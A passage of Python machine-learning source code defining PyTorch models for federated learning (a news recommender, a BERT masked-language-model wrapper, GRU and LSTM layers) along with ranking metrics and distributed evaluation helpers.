scores = torch.einsum('ijk,ik->ij', can_vecs, user_vec)
logits = scores
return logits, user_vec
def news_encoder(self, news_title):
news_word_vecs = self.title_word_embedding_layer(news_title)
news_vec = self.doc_encoder(news_word_vecs)
return news_vec
def mrr_score(y_true, y_score):
order = np.argsort(y_score)[::-1]
y_true = np.take(y_true, order)
rr_score = y_true / (np.arange(len(y_true)) + 1)
return np.sum(rr_score) / np.sum(y_true)
def dcg_score(y_true, y_score, k=10):
order = np.argsort(y_score)[::-1]
y_true = np.take(y_true, order[:k])
gains = 2 ** y_true - 1
discounts = np.log2(np.arange(len(y_true)) + 2)
return np.sum(gains / discounts)
def ndcg_score(y_true, y_score, k=10):
best = dcg_score(y_true, y_true, k)
actual = dcg_score(y_true, y_score, k)
return actual / best
class FEDNEWS(BaseModel):
"""This is a PyTorch model with some extra methods"""
def __init__(self, model_config):
super().__init__()
root_data_path = model_config['embbeding_path']
embedding_path = model_config['embbeding_path']
news, news_index, category_dict, subcategory_dict, word_dict = self.read_news(root_data_path, ['train', 'val'])
title_word_embedding_matrix, _ = self.load_matrix(embedding_path, word_dict)
self.net = FedNewsRec(title_word_embedding_matrix)
def loss(self, input: torch.Tensor) ->torch.Tensor:
"""Performs forward step and computes the loss"""
if not self.net.training:
return torch.tensor(0)
device = 'cuda' if torch.cuda.is_available() else 'cpu'
(click, sample), label = input['x'], input['y']
click = click
sample = sample
label = label
criterion = CrossEntropyLoss()
output, _ = self.net.forward(click, sample)
return criterion(output, label)
def inference(self, input):
"""Performs forward step and computes metrics"""
device = 'cuda' if torch.cuda.is_available() else 'cpu'
(nv_hist, nv_imp), labels = input['x'], input['y']
nv_hist = nv_hist
nv_imp = nv_imp
nv = self.net.news_encoder(nv_imp).detach().cpu().numpy()
nv_hist = self.net.news_encoder(nv_hist)
uv = self.net.user_encoder(nv_hist.unsqueeze(0)).detach().cpu().numpy()[0]
score = np.dot(nv, uv)
auc = roc_auc_score(labels, score)
mrr = mrr_score(labels, score)
acc = ndcg_score(labels, score, k=1)
ndcg5 = ndcg_score(labels, score, k=5)
ndcg10 = ndcg_score(labels, score, k=10)
return {'output': None, 'acc': acc, 'batch_size': 1, 'auc': {'value': auc, 'higher_is_better': True}, 'mrr': {'value': mrr, 'higher_is_better': True}, 'ndcg5': {'value': ndcg5, 'higher_is_better': True}, 'ndcg10': {'value': ndcg10, 'higher_is_better': True}}
def read_news(self, root_data_path, modes):
news = {}
category = []
subcategory = []
news_index = {}
index = 1
word_dict = {}
word_index = 1
for mode in modes:
with open(os.path.join(root_data_path, mode, 'news.tsv'), encoding='utf8') as f:
lines = f.readlines()
for line in lines:
splited = line.strip('\n').split('\t')
doc_id, vert, subvert, title = splited[0:4]
if doc_id in news_index:
continue
news_index[doc_id] = index
index += 1
category.append(vert)
subcategory.append(subvert)
title = title.lower()
title = word_tokenize(title)
news[doc_id] = [vert, subvert, title]
for word in title:
word = word.lower()
if not word in word_dict:
word_dict[word] = word_index
word_index += 1
category = list(set(category))
subcategory = list(set(subcategory))
category_dict = {}
index = 1
for c in category:
category_dict[c] = index
index += 1
subcategory_dict = {}
index = 1
for c in subcategory:
subcategory_dict[c] = index
index += 1
return news, news_index, category_dict, subcategory_dict, word_dict
def load_matrix(self, embedding_path, word_dict):
embedding_matrix = np.zeros((len(word_dict) + 1, 300))
have_word = []
with open(os.path.join(embedding_path, 'glove.840B.300d.txt'), 'rb') as f:
while True:
l = f.readline()
if len(l) == 0:
break
l = l.split()
word = l[0].decode()
if word in word_dict:
index = word_dict[word]
tp = [float(x) for x in l[1:]]
embedding_matrix[index] = np.array(tp)
have_word.append(word)
return embedding_matrix, have_word
class EvalPrediction(NamedTuple):
"""
Evaluation output (always contains labels), to be used to compute metrics.
Parameters:
predictions (:obj:`np.ndarray`): Predictions of the model.
label_ids (:obj:`np.ndarray`): Targets to be matched.
"""
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: np.ndarray
def print_rank(str, loglevel=logging.INFO):
str = '{} : {}'.format(time.ctime(), str)
logging.log(loglevel, str)
class ComputeMetrics:
def __init__(self, p: EvalPrediction, mask=None):
self.EvalPrediction = EvalPrediction
self.compute_metrics(self.EvalPrediction)
@staticmethod
def compute_metrics(p: EvalPrediction, mask=None):
print_rank('Prediction Block Size: {}'.format(p.predictions.size()), loglevel=logging.DEBUG)
if len(list(p.predictions.size())) < 3:
if len(list(p.predictions.size())) < 2:
print_rank('There is something REALLY wrong with prediction tensor:'.format(p.predictions.size()), loglevel=logging.INFO)
return {'acc': torch.tensor(0.0)}
print_rank('There is something wrong with prediction tensor:'.format(p.predictions.size()), loglevel=logging.INFO)
preds = np.argmax(p.predictions, axis=1)
else:
preds = np.argmax(p.predictions, axis=2)
if mask is None:
return {'acc': (preds == p.label_ids).float().mean()}
else:
valid = mask == 1
return {'acc': (preds.eq(p.label_ids.cpu()) * valid.cpu()).float().mean()}
def _get_first_shape(arrays):
"""Return the shape of the first array found in the nested struct `arrays`."""
if isinstance(arrays, (list, tuple)):
return _get_first_shape(arrays[0])
return arrays.shape
def nested_expand_like(arrays, new_seq_length, padding_index=-100):
""" Expand the `arrays` so that the second dimension grows to `new_seq_length`. Uses `padding_index` for padding."""
if isinstance(arrays, (list, tuple)):
return type(arrays)(nested_expand_like(x, new_seq_length, padding_index=padding_index) for x in arrays)
result = np.full_like(arrays, padding_index, shape=(arrays.shape[0], new_seq_length) + arrays.shape[2:])
result[:, :arrays.shape[1]] = arrays
return result
def nested_new_like(arrays, num_samples, padding_index=-100):
""" Create the same nested structure as `arrays` with a first dimension always at `num_samples`."""
if isinstance(arrays, (list, tuple)):
return type(arrays)(nested_new_like(x, num_samples) for x in arrays)
return np.full_like(arrays, padding_index, shape=(num_samples, *arrays.shape[1:]))
def nested_truncate(tensors, limit):
"""Truncate `tensors` at `limit` (even if it's a nested list/tuple of tensors)."""
if isinstance(tensors, (list, tuple)):
return type(tensors)(nested_truncate(t, limit) for t in tensors)
return tensors[:limit]
class DistributedTensorGatherer:
"""
A class responsible for properly gathering tensors (or nested list/tuple of tensors) on the CPU by chunks.
If our dataset has 16 samples with a batch size of 2 on 3 processes and we gather then transfer on CPU at every
step, our sampler will generate the following indices:
:obj:`[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 0, 1]`
to get something of size a multiple of 3 (so that each process gets the same dataset length). Then process 0, 1 and
2 will be responsible of making predictions for the following samples:
- P0: :obj:`[0, 1, 2, 3, 4, 5]`
- P1: :obj:`[6, 7, 8, 9, 10, 11]`
- P2: :obj:`[12, 13, 14, 15, 0, 1]`
The first batch treated on each process will be
- P0: :obj:`[0, 1]`
- P1: :obj:`[6, 7]`
- P2: :obj:`[12, 13]`
So if we gather at the end of the first batch, we will get a tensor (nested list/tuple of tensor) corresponding to
the following indices:
:obj:`[0, 1, 6, 7, 12, 13]`
If we directly concatenate our results without taking any precautions, the user will then get the predictions for
the indices in this order at the end of the prediction loop:
:obj:`[0, 1, 6, 7, 12, 13, 2, 3, 8, 9, 14, 15, 4, 5, 10, 11, 0, 1]`
For some reason, that's not going to roll their boat. This class is there to solve that problem.
Args:
world_size (:obj:`int`):
The number of processes used in the distributed training.
num_samples (:obj:`int`):
The number of samples in our dataset.
make_multiple_of (:obj:`int`, `optional`):
If passed, the class assumes the datasets passed to each process are made to be a multiple of this argument
(by adding samples).
padding_index (:obj:`int`, `optional`, defaults to -100):
The padding index to use if the arrays don't all have the same sequence length.
"""
def __init__(self, world_size, num_samples, make_multiple_of=None, padding_index=-100):
self.world_size = world_size
self.num_samples = num_samples
total_size = world_size if make_multiple_of is None else world_size * make_multiple_of
self.total_samples = int(np.ceil(num_samples / total_size)) * total_size
self.process_length = self.total_samples // world_size
self._storage = None
self._offsets = None
self.padding_index = padding_index
def add_arrays(self, arrays):
"""
Add :obj:`arrays` to the internal storage, Will initialize the storage to the full size at the first arrays
passed so that if we're bound to get an OOM, it happens at the beginning.
"""
if arrays is None:
return
if self._storage is None:
self._storage = nested_new_like(arrays, self.total_samples, padding_index=self.padding_index)
self._offsets = list(range(0, self.total_samples, self.process_length))
else:
storage_shape = _get_first_shape(self._storage)
arrays_shape = _get_first_shape(arrays)
if len(storage_shape) > 1 and storage_shape[1] < arrays_shape[1]:
self._storage = nested_expand_like(self._storage, arrays_shape[1], padding_index=self.padding_index)
slice_len = self._nested_set_tensors(self._storage, arrays)
for i in range(self.world_size):
self._offsets[i] += slice_len
def _nested_set_tensors(self, storage, arrays):
if isinstance(arrays, (list, tuple)):
for x, y in zip(storage, arrays):
slice_len = self._nested_set_tensors(x, y)
return slice_len
assert arrays.shape[0] % self.world_size == 0, f'Arrays passed should all have a first dimension multiple of {self.world_size}, found {arrays.shape[0]}.'
slice_len = arrays.shape[0] // self.world_size
for i in range(self.world_size):
if len(arrays.shape) == 1:
storage[self._offsets[i]:self._offsets[i] + slice_len] = arrays[i * slice_len:(i + 1) * slice_len]
else:
storage[self._offsets[i]:self._offsets[i] + slice_len, :arrays.shape[1]] = arrays[i * slice_len:(i + 1) * slice_len]
return slice_len
def finalize(self):
"""
Return the properly gathered arrays and truncate to the number of samples (since the sampler added some extras
to get each process a dataset of the same length).
"""
if self._storage is None:
return
if self._offsets[0] != self.process_length:
logger.warn('Not all data has been set. Are you sure you passed all values?')
return nested_truncate(self._storage, self.num_samples)
def numpy_pad_and_concatenate(array1, array2, padding_index=-100):
"""Concatenates `array1` and `array2` on first axis, applying padding on the second if necessary."""
if len(array1.shape) == 1 or array1.shape[1] == array2.shape[1]:
return np.concatenate((array1, array2), dim=0)
new_shape = (array1.shape[0] + array2.shape[0], max(array1.shape[1], array2.shape[1])) + array1.shape[2:]
result = np.full_like(array1, padding_index, shape=new_shape)
result[:array1.shape[0], :array1.shape[1]] = array1
result[array1.shape[0]:, :array2.shape[1]] = array2
return result
def torch_pad_and_concatenate(tensor1, tensor2, padding_index=-100):
"""Concatenates `tensor1` and `tensor2` on first axis, applying padding on the second if necessary."""
if len(tensor1.shape) == 1 or tensor1.shape[1] == tensor2.shape[1]:
return torch.cat((tensor1, tensor2), dim=0)
new_shape = (tensor1.shape[0] + tensor2.shape[0], max(tensor1.shape[1], tensor2.shape[1])) + tensor1.shape[2:]
result = tensor1.new_full(new_shape, padding_index)
result[:tensor1.shape[0], :tensor1.shape[1]] = tensor1
result[tensor1.shape[0]:, :tensor2.shape[1]] = tensor2
return result
def nested_concat(tensors, new_tensors, padding_index=-100):
"""
Concat the `new_tensors` to `tensors` on the first dim and pad them on the second if needed. Works for tensors or
nested list/tuples of tensors.
"""
assert type(tensors) == type(new_tensors), f'Expected `tensors` and `new_tensors` to have the same type but found {type(tensors)} and {type(new_tensors)}.'
if isinstance(tensors, (list, tuple)):
return type(tensors)(nested_concat(t, n, padding_index=padding_index) for t, n in zip(tensors, new_tensors))
elif isinstance(tensors, torch.Tensor):
return torch_pad_and_concatenate(tensors, new_tensors, padding_index=padding_index)
elif isinstance(tensors, np.ndarray):
return numpy_pad_and_concatenate(tensors, new_tensors, padding_index=padding_index)
else:
raise TypeError(f'Unsupported type for concatenation: got {type(tensors)}')
def nested_detach(tensors):
"""Detach `tensors` (even if it's a nested list/tuple of tensors)."""
if isinstance(tensors, (list, tuple)):
return type(tensors)(nested_detach(t) for t in tensors)
return tensors.detach()
def nested_numpify(tensors):
"""Numpify `tensors` (even if it's a nested list/tuple of tensors)."""
if isinstance(tensors, (list, tuple)):
return type(tensors)(nested_numpify(t) for t in tensors)
return tensors.cpu().numpy()
def set_seed(seed: int):
"""
Helper function for reproducible behavior to set the seed in ``random``, ``numpy``, ``torch`` and/or ``tf`` (if
installed).
Args:
seed (:obj:`int`): The seed to set.
"""
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
def to_device(x):
return x if torch.cuda.is_available() else x
class BERT(BaseModel):
def __init__(self, model_config, **kwargs):
super(BERT, self).__init__()
"""
from transformers import RobertaConfig
config = RobertaConfig(
vocab_size=52_000,
max_position_embeddings=514,
num_attention_heads=12,
num_hidden_layers=6,
type_vocab_size=1,
)
from transformers import RobertaTokenizerFast
tokenizer = RobertaTokenizerFast.from_pretrained("./EsperBERTo", max_len=512)
from transformers import RobertaForMaskedLM
model = RobertaForMaskedLM(config=config)
"""
args = model_config['BERT']
model_args, training_args = args['model'], args['training']
set_seed(training_args['seed'])
self.gradient_accumulation_steps = model_args.get('gradient_accumulation_steps', 1)
self.past_index = model_args.get('past_index', -1)
self.prediction_loss_only = model_args.get('prediction_loss_only', True)
self.eval_accumulation_steps = model_args.get('eval_accumulation_steps', None)
self.label_names = model_args.get('label_names', None)
self.batch_size = training_args['batch_size']
self.model_name = model_args['model_name']
if 'model_name_or_path' not in model_args:
model_args['model_name_or_path'] = self.model_name
if training_args['label_smoothing_factor'] != 0:
self.label_smoother = LabelSmoother(epsilon=training_args['label_smoothing_factor'])
else:
self.label_smoother = None
self.label_names = ['labels'] if self.label_names is None else self.label_names
config_kwargs = {'cache_dir': model_args['cache_dir'], 'revision': None, 'use_auth_token': None}
if 'config_name' in model_args:
config = AutoConfig.from_pretrained(model_args['config_name'], **config_kwargs)
elif 'model_name_or_path' in model_args:
config = AutoConfig.from_pretrained(model_args['model_name_or_path'], **config_kwargs)
else:
raise ValueError('You are instantiating a new configuration from scratch. This is not supported by this script.')
tokenizer_kwargs = {'cache_dir': model_args['cache_dir'], 'use_fast': model_args['use_fast_tokenizer'], 'use_auth_token': None}
if 'tokenizer_name' in model_args:
tokenizer = AutoTokenizer.from_pretrained(model_args['tokenizer_name'], **tokenizer_kwargs)
elif 'model_name_or_path' in model_args:
None
tokenizer = AutoTokenizer.from_pretrained(model_args['model_name_or_path'], **tokenizer_kwargs)
else:
raise ValueError('You are instantiating a new tokenizer from scratch. This is not supported by this script.')
self.output_layer_size = len(tokenizer)
if 'model_name_or_path' in model_args:
None
self.model = AutoModelForMaskedLM.from_pretrained(model_args['model_name_or_path'], from_tf=False, config=config, cache_dir=model_args['cache_dir'], use_auth_token=None)
if 'adapter' in model_args:
if model_args['adapter']:
self.model.add_adapter('FLUTE')
self.model.train_adapter('FLUTE')
else:
raise ValueError('You are instantiating a new model from scratch. This is not supported by this script.')
self.model.resize_token_embeddings(self.output_layer_size)
total_params = 0
trainable_params = 0
for p in self.model.parameters():
total_params += p.numel()
if p.requires_grad:
trainable_params += p.numel()
print_rank(f'Total parameters count: {total_params}', loglevel=logging.DEBUG)
print_rank(f'Trainable parameters count: {trainable_params}', loglevel=logging.DEBUG)
print_rank(f'Original Bert parameters count: {total_params - trainable_params}', loglevel=logging.DEBUG)
def copy_state_dict(self, state_dict):
self.model.state_dict = state_dict.clone()
def get_model(self):
return self.model
def _prepare_inputs(self, inputs):
"""
Prepare :obj:`inputs` before feeding them to the model, converting them to tensors if they are not already and
handling potential state.
"""
for k, v in inputs.items():
if isinstance(v, T.Tensor):
inputs[k] = to_device(v)
if self.past_index >= 0 and self._past is not None:
inputs['mems'] = self._past
return inputs
def forward(self, inputs):
inputs = self._prepare_inputs(inputs)
return self.model(**inputs)
def loss(self, inputs):
"""
Perform a training step on a batch of inputs.
Subclass and override to inject custom behavior.
Args:
model (:obj:`nn.Module`):
The model to train.
inputs (:obj:`Dict[str, Union[T.Tensor, Any]]`):
The inputs and targets of the model.
The dictionary will be unpacked before being fed to the model. Most models expect the targets under the
argument :obj:`labels`. Check your model's documentation for all accepted arguments.
Return:
:obj:`T.Tensor`: The tensor with training loss on this batch.
"""
inputs = self._prepare_inputs(inputs)
loss = self.compute_loss(inputs)
loss = loss / self.gradient_accumulation_steps
return loss
def compute_loss(self, inputs_orig, return_outputs=False):
"""
How the loss is computed by Trainer. By default, all models return the loss in the first element.
Subclass and override for custom behavior.
inputs (:obj:`Dict[str, Union[T.Tensor, Any]]`):
The inputs and targets of the model.
The dictionary will be unpacked before being fed to the model. Most models expect the targets under the
argument :obj:`labels`. Check your model's documentation for all accepted arguments.
"""
inputs = copy.deepcopy(inputs_orig)
if self.label_smoother is not None and 'labels' in inputs:
labels = inputs['labels'].detach().cpu()
else:
labels = None
if 'roberta' in self.model_name:
if 'attention_mask' in inputs:
inputs.pop('attention_mask')
if 'special_tokens_mask' in inputs:
inputs.pop('special_tokens_mask')
outputs = self.model(**inputs)
if self.past_index >= 0:
self._past = outputs[self.past_index]
if labels is not None:
loss = self.label_smoother(outputs, labels)
else:
loss = outputs['loss'] if isinstance(outputs, dict) else outputs[0]
return (loss, outputs) if return_outputs else loss
def inference(self, inputs, ignore_keys: Optional[List[str]]=[], metric_key_prefix: str='eval') ->List[float]:
"""
Run prediction and returns predictions and potential metrics.
Depending on the dataset and your use case, your test dataset may contain labels. In that case, this method
will also return metrics, like in :obj:`evaluate()`.
Args:
inputs (:obj:`Dict[str, Union[T.Tensor, Any]]`):
The inputs and targets of the model.
The dictionary will be unpacked before being fed to the model. Most models expect the targets under the
argument :obj:`labels`. Check your model's documentation for all accepted arguments.
ignore_keys (:obj:`Lst[str]`, `optional`):
A list of keys in the output of your model (if it is a dictionary) that should be ignored when
gathering predictions.
metric_key_prefix (:obj:`str`, `optional`, defaults to :obj:`"eval"`):
An optional prefix to be used as the metrics key prefix. For example the metrics "bleu" will be named
"eval_bleu" if the prefix is "eval" (default)
.. note::
If your predictions or labels have different sequence length (for instance because you're doing dynamic
padding in a token classification task) the predictions will be padded (on the right) to allow for
concatenation into one array. The padding index is -100.
Returns: `NamedTuple` A namedtuple with the following keys:
- predictions (:obj:`np.ndarray`): The predictions on :obj:`test_dataset`.
- label_ids (:obj:`np.ndarray`, `optional`): The labels (if the dataset contained some).
- metrics (:obj:`Dict[str, float]`, `optional`): The potential dictionary of metrics (if the dataset
contained labels).
"""
output, batch_size = self.prediction_loop(inputs, description='Evaluation', ignore_keys=ignore_keys, metric_key_prefix=metric_key_prefix)
return {'output': output['eval_loss'], 'acc': output['eval_acc'], 'batch_size': batch_size[0]}
def prediction_loop(self, inputs, description: str, ignore_keys: Optional[List[str]]=None, metric_key_prefix: str='eval') ->Union[Dict, List[int]]:
"""
Prediction/evaluation loop, shared by :obj:`Trainer.evaluate()` and :obj:`Trainer.predict()`.
Works both with or without labels.
"""
out_label_ids = None
if 'labels' in inputs:
out_label_ids = inputs['labels'].detach().cpu()
if 'attention_mask' in inputs:
attention_mask = inputs['attention_mask'].detach().cpu()
losses_host = None
preds_host = None
labels_host = None
world_size = 1
num_hosts = 1
eval_losses_gatherer = DistributedTensorGatherer(world_size, num_hosts, make_multiple_of=self.batch_size)
if not self.prediction_loss_only:
preds_gatherer = DistributedTensorGatherer(world_size, num_hosts)
labels_gatherer = DistributedTensorGatherer(world_size, num_hosts)
self.model.eval()
if self.past_index >= 0:
self._past = None
loss, logits, _ = self.prediction_step(inputs, ignore_keys=ignore_keys, has_labels=True)
if loss is not None:
losses = loss.repeat(self.batch_size).cpu()
losses_host = losses if losses_host is None else T.cat((losses_host, losses), dim=0)
if logits is not None:
preds_host = logits.detach().cpu() if preds_host is None else nested_concat(preds_host, logits, padding_index=-100)
if out_label_ids is not None:
labels_host = out_label_ids if labels_host is None else nested_concat(labels_host, out_label_ids, padding_index=-100)
if self.eval_accumulation_steps is not None:
eval_losses_gatherer.add_arrays(self._gather_and_numpify(losses_host, 'eval_losses'))
if not self.prediction_loss_only:
preds_gatherer.add_arrays(self._gather_and_numpify(preds_host, 'eval_preds'))
labels_gatherer.add_arrays(self._gather_and_numpify(labels_host, 'eval_label_ids'))
losses_host, preds_host, labels_host = None, None, None
if self.past_index and hasattr(self, '_past'):
delattr(self, '_past')
if num_hosts > 1:
eval_losses_gatherer.add_arrays(self._gather_and_numpify(losses_host, 'eval_losses'), want_masked=True)
if not self.prediction_loss_only:
preds_gatherer.add_arrays(self._gather_and_numpify(preds_host, 'eval_preds'))
labels_gatherer.add_arrays(self._gather_and_numpify(labels_host, 'eval_label_ids'))
eval_loss = eval_losses_gatherer.finalize()
preds = preds_gatherer.finalize() if not self.prediction_loss_only else None
label_ids = labels_gatherer.finalize() if not self.prediction_loss_only else None
else:
eval_loss = losses_host
preds = preds_host
label_ids = labels_host
if preds is not None and label_ids is not None:
metrics = ComputeMetrics.compute_metrics(EvalPrediction(predictions=preds, label_ids=label_ids), attention_mask)
else:
metrics = {}
if eval_loss is not None:
metrics[f'{metric_key_prefix}_loss'] = eval_loss.mean().item()
for key in list(metrics.keys()):
if not key.startswith(f'{metric_key_prefix}_'):
metrics[f'{metric_key_prefix}_{key}'] = metrics.pop(key).item()
return metrics, preds.size()
def _gather_and_numpify(self, tensors, name):
"""
Gather value of `tensors` (tensor or list/tuple of nested tensors) and convert them to numpy before
concatenating them to `gathered`
"""
if tensors is None:
return
return nested_numpify(tensors)
def prediction_step(self, inputs, ignore_keys: Optional[List[str]]=None, has_labels: bool=None) ->Tuple[Optional[float], Optional[T.Tensor], Optional[T.Tensor]]:
"""
Perform an evaluation step on :obj:`model` using obj:`inputs`.
Subclass and override to inject custom behavior.
Args:
model (:obj:`nn.Module`):
The model to evaluate.
inputs (:obj:`Dict[str, Union[T.Tensor, Any]]`):
The inputs and targets of the model.
The dictionary will be unpacked before being fed to the model. Most models expect the targets under the
argument :obj:`labels`. Check your model's documentation for all accepted arguments.
prediction_loss_only (:obj:`bool`):
Whether or not to return the loss only.
ignore_keys (:obj:`Lst[str]`, `optional`):
A list of keys in the output of your model (if it is a dictionary) that should be ignored when
gathering predictions.
Return:
Tuple[Optional[float], Optional[T.Tensor], Optional[T.Tensor]]: A tuple with the loss, logits and
labels (each being optional).
"""
inputs = self._prepare_inputs(inputs)
if has_labels:
labels = inputs['labels'].detach().cpu()
if len(labels) == 1:
labels = labels[0]
else:
labels = None
with T.no_grad():
if has_labels:
loss, outputs = self.compute_loss(inputs, return_outputs=True)
loss = loss.mean().detach()
if isinstance(outputs, dict):
logits = outputs['logits']
else:
logits = outputs[1:]
else:
loss = None
outputs = self.model(**inputs)
if isinstance(outputs, dict):
logits = tuple(v for k, v in outputs.items() if k not in ignore_keys)
else:
logits = outputs
if self.past_index >= 0:
self._past = outputs[self.past_index - 1]
if self.prediction_loss_only:
return loss, None, None
logits = nested_detach(logits)
if len(logits) == 1:
logits = logits[0]
return loss, logits, labels
def floating_point_ops(self, inputs):
"""
For models that inherit from :class:`~transformers.PreTrainedModel`, uses that method to compute the number of
floating point operations for every backward + forward pass. If using another model, either implement such a
method in the model or subclass and override this method.
Args:
inputs (:obj:`Dict[str, Union[T.Tensor, Any]]`):
The inputs and targets of the model.
Returns:
:obj:`int`: The number of floating-point operations.
"""
if hasattr(self.model, 'floating_point_ops'):
return self.model.floating_point_ops(inputs)
else:
return 0
def set_eval(self):
"""
Bring the model into evaluation mode
"""
self.model.eval()
def set_train(self):
"""
Bring the model into train mode
"""
self.model.train()
class GRU2(T.nn.Module):
def __init__(self, input_size, hidden_size, input_bias, hidden_bias):
super(GRU2, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.w_ih = T.nn.Linear(input_size, 3 * hidden_size, input_bias)
self.w_hh = T.nn.Linear(hidden_size, 3 * hidden_size, hidden_bias)
def _forward_cell(self, input: Tensor, hidden: Tensor) ->Tensor:
g_i = self.w_ih(input)
g_h = self.w_hh(hidden)
i_r, i_i, i_n = g_i.chunk(3, 1)
h_r, h_i, h_n = g_h.chunk(3, 1)
reset_gate = T.sigmoid(i_r + h_r)
input_gate = T.sigmoid(i_i + h_i)
new_gate = T.tanh(i_n + reset_gate * h_n)
hy = new_gate + input_gate * (hidden - new_gate)
return hy
def forward(self, input: Tensor) ->Tuple[Tensor, Tensor]:
hiddens: List[Tensor] = [to_device(T.zeros((input.shape[0], self.hidden_size)))]
for step in range(input.shape[1]):
hidden = self._forward_cell(input[:, step], hiddens[-1])
hiddens.append(hidden)
return T.stack(hiddens, dim=1), hiddens[-1]
class Embedding(T.nn.Module):
def __init__(self, vocab_size, embedding_size):
super(Embedding, self).__init__()
self.vocab_size = vocab_size
self.embedding_size = embedding_size
self.table = T.nn.Parameter(T.zeros((vocab_size, embedding_size)))
self.unembedding_bias = T.nn.Parameter(T.zeros(vocab_size))
delta = (3 / self.table.shape[1]) ** 0.5
T.nn.init.uniform_(self.table, -delta, delta)
def forward(self, input: Tensor, embed: bool) ->Tensor:
if embed:
output = T.nn.functional.embedding(input, self.table)
else:
output = input @ self.table.t() + self.unembedding_bias
return output
def softmax(X, theta=1.0, axis=None):
"""Compute the softmax of each element along an axis of X.
Args:
X (ndarray): x, probably should be floats.
theta (float): used as a multiplier prior to exponentiation. Default = 1.0
axis : axis to compute values along. Default is the first non-singleton axis.
Returns:
An array the same size as X. The result will sum to 1 along the specified axis.
"""
y = np.atleast_2d(X)
if axis is None:
axis = next(j[0] for j in enumerate(y.shape) if j[1] > 1)
y = y * float(theta)
y = y - np.expand_dims(np.max(y, axis=axis), axis)
y = np.exp(y)
ax_sum = np.expand_dims(np.sum(y, axis=axis), axis)
p = y / ax_sum
if len(X.shape) == 1:
p = p.flatten()
return p
class GRU(BaseModel):
def __init__(self, model_config, OOV_correct=False, dropout=0.0, topK_results=1, wantLogits=False, **kwargs):
super(GRU, self).__init__()
self.vocab_size = model_config['vocab_size']
self.embedding_size = model_config['embed_dim']
self.hidden_size = model_config['hidden_dim']
self.embedding = Embedding(self.vocab_size, self.embedding_size)
self.rnn = GRU2(self.embedding_size, self.hidden_size, True, True)
self.squeeze = T.nn.Linear(self.hidden_size, self.embedding_size, bias=False)
self.OOV_correct = OOV_correct
self.topK_results = topK_results
self.dropout = dropout
self.wantLogits = wantLogits
if self.dropout > 0.0:
self.drop_layer = T.nn.Dropout(p=self.dropout)
def forward(self, input: T.Tensor) ->Tuple[Tensor, Tensor]:
input = input['x'] if isinstance(input, dict) else input
input = to_device(input)
embedding = self.embedding(input, True)
hiddens, state = self.rnn(embedding)
if self.dropout > 0.0:
hiddens = self.drop_layer(hiddens)
output = self.embedding(self.squeeze(hiddens), False)
return output, state
def loss(self, input: T.Tensor) ->T.Tensor:
input = input['x'] if isinstance(input, dict) else input
input = to_device(input)
non_pad_mask = input >= 0
input = input * non_pad_mask.long()
non_pad_mask = non_pad_mask.view(-1)
output, _ = self.forward(input[:, :-1])
targets = input.view(-1)[non_pad_mask]
preds = output.view(-1, self.vocab_size)[non_pad_mask]
return T.nn.functional.cross_entropy(preds, targets)
def inference(self, input):
input = input['x'] if isinstance(input, dict) else input
input = to_device(input)
non_pad_mask = input >= 0
input = input * non_pad_mask.long()
non_pad_mask = non_pad_mask.view(-1)
output, _ = self.forward(input[:, :-1])
targets = input.view(-1)[non_pad_mask]
preds = output.view(-1, self.vocab_size)[non_pad_mask]
probs_topK, preds_topK = T.topk(preds, self.topK_results, sorted=True, dim=1)
probs, preds = probs_topK[:, 0], preds_topK[:, 0]
if self.OOV_correct:
acc = preds.eq(targets).float().mean()
else:
valid = preds != 0
acc = (preds.eq(targets) * valid).float().mean()
if self.wantLogits:
if 1:
output = {'probabilities': softmax(probs_topK.cpu().detach().numpy(), axis=1), 'predictions': preds_topK.cpu().detach().numpy(), 'labels': targets.cpu().detach().numpy()}
else:
output = {'probabilities': probs_topK.cpu().detach().numpy(), 'predictions': preds_topK.cpu().detach().numpy(), 'labels': targets.cpu().detach().numpy()}
return {'output': output, 'acc': acc.item(), 'batch_size': input.shape[0]}
class SequenceWise(nn.Module):
def __init__(self, module):
"""
Collapses input of dim T*N*H to (T*N)*H, and applies to a module.
Allows handling of variable sequence lengths and minibatch sizes.
:param module: Module to apply input to.
"""
super(SequenceWise, self).__init__()
self.module = module
def forward(self, x):
t, n = x.size(0), x.size(1)
x = x.view(t * n, -1)
x = x.contiguous()
x = self.module(x)
x = x.view(t, n, -1)
return x
def __repr__(self):
tmpstr = self.__class__.__name__ + ' (\n'
tmpstr += self.module.__repr__()
tmpstr += ')'
return tmpstr
class BatchRNN(nn.Module):
def __init__(self, input_size, hidden_size, rnn_type=nn.LSTM, bidirectional=False, batch_norm=True, dropout=0.0, multi=1):
super(BatchRNN, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.batch_norm_activate = batch_norm
self.bidirectional = bidirectional
self.multi = multi
self.dropout = dropout
if self.batch_norm_activate:
self.batch_norm = SequenceWise(nn.BatchNorm1d(input_size))
self.rnn = rnn_type(input_size=input_size, hidden_size=hidden_size, bidirectional=bidirectional, bias=True, batch_first=True, dropout=self.dropout)
self.num_directions = 2 if bidirectional else 1
def forward(self, x):
if x.dim() == 2:
x = x.unsqueeze(1)
if self.batch_norm_activate:
x = x.contiguous()
x = self.batch_norm(x)
x, _ = self.rnn(x)
if self.bidirectional and self.multi < 2:
x = x.view(x.size(0), x.size(1), 2, -1).sum(2).view(x.size(0), x.size(1), -1)
return x
class NeuralNetwork(nn.Module):
def __init__(self, params, wantLSTM=False, batch_norm=False):
super(NeuralNetwork, self).__init__()
"""
The following parameters need revisiting
self.number_of_actions = 2
self.gamma = 0.99
self.final_epsilon = 0.0001
self.initial_epsilon = 0.1
self.number_of_iterations = 2000000
self.replay_memory_size = 10000
self.minibatch_size = 32
optimizer = optim.Adam(model.parameters(), lr=1e-6)
criterion = nn.MSELoss()
"""
self.wantLSTM = wantLSTM
self.batch_norm = batch_norm
params = [int(x) for x in params.split(',')]
layers = []
self.softmax = nn.Softmax(dim=1)
if self.wantLSTM:
rnns = []
for i in range(1, len(params) - 2):
multi = 1 if i == 1 else 1
rnn = BatchRNN(input_size=params[i - 1] * multi, hidden_size=params[i], rnn_type=nn.LSTM, bidirectional=True, batch_norm=batch_norm, multi=1, dropout=0.0)
rnns.append(('%d' % (i - 1), rnn))
self.rnn = nn.Sequential(OrderedDict(rnns))
